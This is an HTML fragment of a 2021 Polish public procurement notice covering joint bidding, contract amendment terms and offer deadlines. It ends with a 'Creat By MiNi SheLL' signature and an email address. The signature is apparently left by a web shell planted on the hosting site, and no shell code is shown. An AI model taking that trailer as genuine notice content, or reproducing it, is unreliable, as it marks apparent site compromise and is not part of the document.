Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu<br/>warunków udziału w postępowaniu w zakresie wskazanym przez zamawiającego (załącznik nr<br/>1,2 do SWZ). - wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia<br/>wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu,<br/>Ogłoszenie nr 2021/BZP 00179402/01 z dnia 2021-09-14<br/>2021-09-14 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>6. Do oferty wykonawca załącza również:<br/>a) pełnomocnictwo<br/>- w przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy<br/>zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego<br/>będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych<br/>wykonawców należy załączyć do oferty.<br/>b) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>- wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden<br/>spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z<br/>którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>- wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te<br/>zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana niniejszej umowy jest dopuszczalna na warunkach określonych w art. 454 i 455<br/>ustawy Prawo zamówień publicznych.<br/>2. Zmiany w niniejszej umowie mogą zostać wprowadzone w zakresie:<br/>- nazwy, adresu oraz osób reprezentujących strony;<br/>- w przypadku zmiany ustawowej stawki podatku VAT, ceny jednostkowe brutto dla każdego z<br/>produktów ulegną zmianie przy czym ceny netto pozostaną bez zmian. W związku ze zmianą<br/>cen jednostkowych brutto, cena stanowiąca wartość całości zamówienia również ulegnie<br/>zmianie proporcjonalnie do zmiany stawki opodatkowania oraz zamawianej ilości<br/>poszczególnych produktów;<br/>- każdej zmiany która jest korzystna dla Dostawcy.<br/>3. Zmiany Umowy mogą być dokonywane za zgodą obu Stron jedynie w drodze pisemnego<br/>aneksu pod rygorem nieważności.<br/>4. Strona wnioskująca o zmianę postanowień niniejszej umowy powiadamia pisemnie drugą<br/>stronę, uzasadniając zmianę okolicznościami faktycznymi oraz prawnymi, a także przedkłada<br/>propozycję aneksu do umowy.<br/>5. Umowa zostaje rozwiązania w razie upływu terminu, na który została zawarta.<br/>6. Umowa ulega rozwiązaniu także w przypadku zrealizowania wartości umowy, o której mowa<br/>w § 2 ust 3 Umowy.<br/>7. Odbiorca zastrzega sobie prawo wypowiedzenia Umowy w każdym czasie jej trwania ze<br/>skutkiem natychmiastowym w przypadku gdyby Dostawca nie wywiązał się z przyjętych w<br/>niniejszej umowie zobowiązań, a w szczególności:<br/>- dwukrotnie dostarczył towar nieodpowiadający obowiązującym polskim normom jakościowym,<br/>- w przypadku co najmniej dwóch nieterminowych dostaw z przyczyn leżących po stronie<br/>Dostawcy.<br/>8. W przypadku rozwiązania umowy z przyczyn określonych w ust. 7 mają odpowiednie<br/>zastosowanie postanowienia § 6 Umowy dotyczące kary umownej i dochodzenia<br/>odszkodowania. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-21 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę (formularz ofertowy) za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna na miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-21 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com